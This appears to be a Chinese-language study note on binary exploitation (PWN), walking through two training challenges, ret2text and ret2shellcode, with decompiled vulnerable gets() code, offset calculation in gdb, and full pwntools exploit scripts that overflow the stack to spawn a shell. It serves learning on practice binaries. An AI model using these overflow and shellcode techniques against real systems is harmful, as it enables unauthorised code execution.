PWN学习笔记

PWN学习笔记

环境准备

• Ubuntu 18 (Ubuntu 20 好多题目程序运行不了)
• pwntools
• gdb & pwndbg
• IDA Pro

题目

ret2text

打开IDA Pro

看到一个get_shell、vulnerable、main函数。

main函数调用了vulnerable函数。

int vulnerable()
{
  char buffer[8]; // [esp+8h] [ebp-10h]

  gets(buffer);
  return 0;
}

这里只要让栈溢出后接入get_shell的地址就能调用get_shell函数了。

使用 IDA PRO 找到get_shell函数的地址：0x08048522

使用GDB调试出偏移量

0xffffcf78 - 0xffffcf68 = 16

16在加4就是偏移量

from pwn import *
context(os='linux',arch='i386',log_level='debug')
io = process("ret2text")
payload = b'a' * 20 + p32(0x08048522)
io.sendline(payload)
io.interactive()

ret2shellcode

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets(&s);
  strncpy(buf2, &s, 0x64u);
  printf("bye bye ~");
  return 0;
}

这里将s 拷贝给buf2

首先要找到buf2的地址：0x0804A080

用 cyclic 1000 生成1000个垃圾字符

gdb ret2shellcode

run

然后输入1000个垃圾字符

cyclic -l 0x62616164

得到112

from pwn import *

context(os='linux',arch='i386',log_level='debug')
io = process("ret2shellcode")
shellcode = asm(shellcraft.i386.linux.sh())
payload = shellcode.ljust(112,'A') + p32(0x0804A080)
io.sendline(payload)
io.interactive()